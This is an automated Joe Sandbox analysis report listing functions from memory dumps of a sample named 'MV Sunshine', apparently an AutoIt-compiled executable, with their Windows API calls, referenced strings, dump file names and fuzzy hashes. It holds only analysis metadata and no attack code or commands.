Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 6741B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90

Function 00F63F70 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118803858.0000000000F60000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: baa16a4d547602761143de296a28a70db802a60bbee45ed92c3a69294686fcb7
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: A4019278E00109EFCB48DF98C5909AEF7F5FB48310F208599E909A7745D730AE51DB80

Function 00F63F10 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118803858.0000000000F60000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 49bb0159274558a6d8d929ea08a6b2a44134ce663d20eb0291e723c632371b94
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 46019278E00109EFCB48DF98C5909AEF7F5FB58310F208599E819A7341D730AE41EB80

Function 00F62900 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118803858.0000000000F60000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 006A37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,006AF910), ref: 006A38AF
IsWindowVisible.USER32(?), ref: 006A38D3

Strings

ADDSTRING, xrefs: 006A399E
GETLINECOUNT, xrefs: 006A3B4E
SELECTSTRING, xrefs: 006A3A8E
GETCURRENTLINE, xrefs: 006A3B75
TABRIGHT, xrefs: 006A3925
ISCHECKED, xrefs: 006A3AC1
CHECK, xrefs: 006A3AF5
GETLINE, xrefs: 006A3C23
TABLEFT, xrefs: 006A390F
SETCURRENTSELECTION, xrefs: 006A3A3E
UNCHECK, xrefs: 006A3B0B
FINDSTRING, xrefs: 006A39FE
ISVISIBLE, xrefs: 006A38BF
CURRENTTAB, xrefs: 006A3945
ISENABLED, xrefs: 006A38F3
HIDEDROPDOWN, xrefs: 006A3988
EDITPASTE, xrefs: 006A3BE7
SENDCOMMANDID, xrefs: 006A3C62
GETCURRENTSELECTION, xrefs: 006A3A6B
SHOWDROPDOWN, xrefs: 006A3968
GETCURRENTCOL, xrefs: 006A3BB0
DELSTRING, xrefs: 006A39D1
GETSELECTED, xrefs: 006A3B2B

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 9741a4ce0a487b704e62a45636c0a2b7deab936cea4d129c50aebf9e45296697
Instruction ID: 9f8ab15a91dfd5a31a36ff43b4ea1afe382d5a73eb62f8db09a90f83a8c53add
Opcode Fuzzy Hash: 9741a4ce0a487b704e62a45636c0a2b7deab936cea4d129c50aebf9e45296697
Instruction Fuzzy Hash: 95D19130604325DBCB54FF10C851AAABBE3AF95354F11845DB8865B3A6CB31EE0ACF95

Function 006AA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 006AA89F
GetSysColorBrush.USER32(0000000F), ref: 006AA8D0
GetSysColor.USER32(0000000F), ref: 006AA8DC
SetBkColor.GDI32(?,000000FF), ref: 006AA8F6
SelectObject.GDI32(?,?), ref: 006AA905
InflateRect.USER32(?,000000FF,000000FF), ref: 006AA930
GetSysColor.USER32(00000010), ref: 006AA938
CreateSolidBrush.GDI32(00000000), ref: 006AA93F
FrameRect.USER32(?,?,00000000), ref: 006AA94E
DeleteObject.GDI32(00000000), ref: 006AA955
InflateRect.USER32(?,000000FE,000000FE), ref: 006AA9A0
FillRect.USER32(?,?,?), ref: 006AA9D2
GetWindowLongW.USER32(?,000000F0), ref: 006AA9FD

Part of subcall function 006AAB60: GetSysColor.USER32(00000012), ref: 006AAB99
Part of subcall function 006AAB60: SetTextColor.GDI32(?,?), ref: 006AAB9D
Part of subcall function 006AAB60: GetSysColorBrush.USER32(0000000F), ref: 006AABB3
Part of subcall function 006AAB60: GetSysColor.USER32(0000000F), ref: 006AABBE
Part of subcall function 006AAB60: GetSysColor.USER32(00000011), ref: 006AABDB
Part of subcall function 006AAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 006AABE9
Part of subcall function 006AAB60: SelectObject.GDI32(?,00000000), ref: 006AABFA
Part of subcall function 006AAB60: SetBkColor.GDI32(?,00000000), ref: 006AAC03
Part of subcall function 006AAB60: SelectObject.GDI32(?,?), ref: 006AAC10
Part of subcall function 006AAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 006AAC2F
Part of subcall function 006AAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006AAC46
Part of subcall function 006AAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 006AAC5B

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 3cac73d3a43a284e8b605a0d58b1da5373f5cf53d2a8ab66e6f7bdba508379c3
Instruction ID: 842353946206770ca17c27a5a71eb5cf78cdf3027ef8304b6705f4f62a76db30
Opcode Fuzzy Hash: 3cac73d3a43a284e8b605a0d58b1da5373f5cf53d2a8ab66e6f7bdba508379c3
Instruction Fuzzy Hash: 17A18471408301AFD710AFA4DC08A5B77EAFF4A321F105B2AF562961A1D735E945CF53

Function 006977BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 006977F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006978B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006978EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00697900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00697946
GetClientRect.USER32(00000000,?), ref: 00697952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00697996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006979A5
GetStockObject.GDI32(00000011), ref: 006979B5
SelectObject.GDI32(00000000,00000000), ref: 006979B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006979C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006979D2
DeleteDC.GDI32(00000000), ref: 006979DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00697A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00697A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00697A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00697A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00697A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00697AAE
GetStockObject.GDI32(00000011), ref: 00697AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00697AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00697ACE

Strings

DISPLAY, xrefs: 0069799B
AutoIt v3, xrefs: 0069793E
msctls_progress32, xrefs: 00697A4F
static, xrefs: 00697990, 00697AA8

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 92c3a50c4aa6114d7417c7fa74af44387bc1871a66942d64f553a4f42e5d9b15
Instruction ID: 69f2e7f87fdad2253f56d6c9bdd5d0a2e2bfb6a02cba95339f0514b5d648540a
Opcode Fuzzy Hash: 92c3a50c4aa6114d7417c7fa74af44387bc1871a66942d64f553a4f42e5d9b15
Instruction Fuzzy Hash: BFA17371A40215BFEB14DBA4DD4AFAE7BBAEB45714F008118FA15AB2E0D770AD00CF65

Function 0068AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0068AF89
GetDriveTypeW.KERNEL32(?,006AFAC0,?,\\.\,006AF910), ref: 0068B066
SetErrorMode.KERNEL32(00000000,006AFAC0,?,\\.\,006AF910), ref: 0068B1C4

Strings

Removable, xrefs: 0068B0B8
Virtual, xrefs: 0068B18C
PhysicalDrive, xrefs: 0068B012
ATAPI, xrefs: 0068B138
SAS, xrefs: 0068B170
Fixed, xrefs: 0068B0AE
RAMDisk, xrefs: 0068B090
ATA, xrefs: 0068B13F
MMC, xrefs: 0068B185
1394, xrefs: 0068B146
SCSI, xrefs: 0068B131
Unknown, xrefs: 0068B086, 0068B12A
Fibre, xrefs: 0068B154
\\.\, xrefs: 0068AFDB
CDROM, xrefs: 0068B09A
iSCSI, xrefs: 0068B169
Network, xrefs: 0068B0A4
USB, xrefs: 0068B15B
SSA, xrefs: 0068B14D
SSD, xrefs: 0068B0F1
FileBackedVirtual, xrefs: 0068B193
SATA, xrefs: 0068B177
RAID, xrefs: 0068B162

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: ec0333d03c1050a15843f327da1cf685a55fc58fba8a01d48ec6711e43744c46
Instruction ID: 3239e88f90e27fde9e265931444f179318b0e4ad44fae0475b5204b82d8cc225
Opcode Fuzzy Hash: ec0333d03c1050a15843f327da1cf685a55fc58fba8a01d48ec6711e43744c46
Instruction Fuzzy Hash: B051F534B88305EBCB00FB90C996CBD73B3AB54341B61621AF44AAB391CB359D42DF52

Function 00626A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00626A91
__wcsnicmp.LIBCMT ref: 00626AA9
__wcsnicmp.LIBCMT ref: 00626AC1
__wcsnicmp.LIBCMT ref: 00626AD9
__wcsnicmp.LIBCMT ref: 00626AF1
__wcsnicmp.LIBCMT ref: 00626B09
__wcsnicmp.LIBCMT ref: 00626B21
__wcsnicmp.LIBCMT ref: 00626B35
__wcsnicmp.LIBCMT ref: 00626B76
__wcsnicmp.LIBCMT ref: 00626B8A
__wcsnicmp.LIBCMT ref: 00626B9E
__wcsnicmp.LIBCMT ref: 00626BB2

Strings

#include-once, xrefs: 00626AEB
#pragma compile, xrefs: 00626A8B
Unterminated group of comments, xrefs: 0065E82C
#cs, xrefs: 00626B2F, 00626B84
Cannot parse #include, xrefs: 0065E819
#comments-start, xrefs: 00626B1B, 00626B70
Bad directive syntax error, xrefs: 0065E743
#ce, xrefs: 00626BAC
#requireadmin, xrefs: 00626ABB
#notrayicon, xrefs: 00626AA3
#include, xrefs: 00626B03
#comments-end, xrefs: 00626B98
#OnAutoItStartRegister, xrefs: 00626AD3

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 1fccce00448592b8e24d5c4bb88a3d0db20fd7a310a38be1e941142a19ccb454
Instruction ID: c465134b10936029e170d259c4e049b566892beedd62371d86f83e0e3b4f9c0c
Opcode Fuzzy Hash: 1fccce00448592b8e24d5c4bb88a3d0db20fd7a310a38be1e941142a19ccb454
Instruction Fuzzy Hash: 9C815A70640626AACF24AF60DC92FEB776BAF15301F044029FD41AA281EB61DB99CB55

Function 006AAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 006AAB99
SetTextColor.GDI32(?,?), ref: 006AAB9D
GetSysColorBrush.USER32(0000000F), ref: 006AABB3
GetSysColor.USER32(0000000F), ref: 006AABBE
CreateSolidBrush.GDI32(?), ref: 006AABC3
GetSysColor.USER32(00000011), ref: 006AABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 006AABE9
SelectObject.GDI32(?,00000000), ref: 006AABFA
SetBkColor.GDI32(?,00000000), ref: 006AAC03
SelectObject.GDI32(?,?), ref: 006AAC10
InflateRect.USER32(?,000000FF,000000FF), ref: 006AAC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006AAC46
GetWindowLongW.USER32(00000000,000000F0), ref: 006AAC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006AACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 006AACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 006AACEC
DrawFocusRect.USER32(?,?), ref: 006AACF7
GetSysColor.USER32(00000011), ref: 006AAD05
SetTextColor.GDI32(?,00000000), ref: 006AAD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 006AAD21
SelectObject.GDI32(?,006AA869), ref: 006AAD38
DeleteObject.GDI32(?), ref: 006AAD43
SelectObject.GDI32(?,?), ref: 006AAD49
DeleteObject.GDI32(?), ref: 006AAD4E
SetTextColor.GDI32(?,?), ref: 006AAD54
SetBkColor.GDI32(?,?), ref: 006AAD5E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 2c46c5c3a83625db776ba6e7951b3f588deb556f967d1452e624509a6648ced3
Instruction ID: a4586e4d3c10fdda092a7bdcce7f3d3d99b21749f2735c3fd7157506eb8a663a
Opcode Fuzzy Hash: 2c46c5c3a83625db776ba6e7951b3f588deb556f967d1452e624509a6648ced3
Instruction Fuzzy Hash: 51615F71900218EFDB11AFE4DC48EAE7B7AEF0A320F105126F915AB2A1D775AD40DF91

Function 006A8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006A8D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006A8D45
CharNextW.USER32(0000014E), ref: 006A8D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 006A8DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 006A8DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006A8DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 006A8DF9
SetWindowTextW.USER32(?,0000014E), ref: 006A8E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 006A8E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 006A8E8C
_memset.LIBCMT ref: 006A8EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 006A8EFA
_memset.LIBCMT ref: 006A8F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 006A8F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 006A8FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 006A9088
InvalidateRect.USER32(?,00000000,00000001), ref: 006A90AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006A90F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006A9121
DrawMenuBar.USER32(?), ref: 006A9130
SetWindowTextW.USER32(?,0000014E), ref: 006A9158

Strings

0, xrefs: 006A90C2

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 92ce4b24bc63fe1efa8196e4672746966fde8993f967e0d4035372c749ae8aef
Instruction ID: aa49d9751b9f1a71e64cc9a54dbb806a44ee14d4a539b045243e277c31cc3930
Opcode Fuzzy Hash: 92ce4b24bc63fe1efa8196e4672746966fde8993f967e0d4035372c749ae8aef
Instruction Fuzzy Hash: 1CE18170900219AEDF20AF60CC84EEE7BBAEF06710F148159F9169B291DB749E85DF61

Function 006A4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 006A4C51
GetDesktopWindow.USER32 ref: 006A4C66
GetWindowRect.USER32(00000000), ref: 006A4C6D
GetWindowLongW.USER32(?,000000F0), ref: 006A4CCF
DestroyWindow.USER32(?), ref: 006A4CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006A4D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006A4D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006A4D68
SendMessageW.USER32(?,00000421,?,?), ref: 006A4D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006A4D90
IsWindowVisible.USER32(?), ref: 006A4DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 006A4DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 006A4DDF
GetWindowRect.USER32(?,?), ref: 006A4DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 006A4E1D
GetMonitorInfoW.USER32(00000000,?), ref: 006A4E37
CopyRect.USER32(?,?), ref: 006A4E4E
SendMessageW.USER32(?,00000412,00000000), ref: 006A4EB9

Strings

tooltips_class32, xrefs: 006A4D1D
0, xrefs: 006A4BFC
(, xrefs: 006A4E2A

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 6211b787cd656f6c98f390b4a6272c0f05449aa65f1797adf7a0673c6e991ea2
Instruction ID: 1792fdc773441defc97e8b4bad44136b14e3da3f2aab42b997618ff2a85cd2ff
Opcode Fuzzy Hash: 6211b787cd656f6c98f390b4a6272c0f05449aa65f1797adf7a0673c6e991ea2
Instruction Fuzzy Hash: E0B18D71604350AFDB44EF64C844B6ABBE6BF85314F00891CF5899B2A1DBB1EC05CFA6

Function 006846D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 006846E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0068470E
_wcscpy.LIBCMT ref: 0068473C
_wcscmp.LIBCMT ref: 00684747
_wcscat.LIBCMT ref: 0068475D
_wcsstr.LIBCMT ref: 00684768
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00684784
_wcscat.LIBCMT ref: 006847CD
_wcscat.LIBCMT ref: 006847D4
_wcsncpy.LIBCMT ref: 006847FF

Strings

04090000, xrefs: 006847BA
%u.%u.%u.%u, xrefs: 00684862
\VarFileInfo\Translation, xrefs: 0068477C
StringFileInfo\, xrefs: 00684757
DefaultLangCodepage, xrefs: 006847E7

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: ea8bf1c48082d2f3eba3b1b6503cf8b3544b3e3d9bb392a2887c78367af303bd
Instruction ID: bd35b4b4457015843bf95e934c8eea7b791f7ff084c06b5893e7575d760ea269
Opcode Fuzzy Hash: ea8bf1c48082d2f3eba3b1b6503cf8b3544b3e3d9bb392a2887c78367af303bd
Instruction Fuzzy Hash: B2412A71A04215BAE750B7B49C43EBF776EDF02710F14016EF904E6282EF70EA4197A9

Function 006227D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006228BC
GetSystemMetrics.USER32(00000007), ref: 006228C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006228EF
GetSystemMetrics.USER32(00000008), ref: 006228F7
GetSystemMetrics.USER32(00000004), ref: 0062291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00622939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00622949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0062297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00622990
GetClientRect.USER32(00000000,000000FF), ref: 006229AE
GetStockObject.GDI32(00000011), ref: 006229CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 006229D5

Part of subcall function 00622344: GetCursorPos.USER32(?), ref: 00622357
Part of subcall function 00622344: ScreenToClient.USER32(006E67B0,?), ref: 00622374
Part of subcall function 00622344: GetAsyncKeyState.USER32(00000001), ref: 00622399
Part of subcall function 00622344: GetAsyncKeyState.USER32(00000002), ref: 006223A7

SetTimer.USER32(00000000,00000000,00000028,00621256), ref: 006229FC

Strings

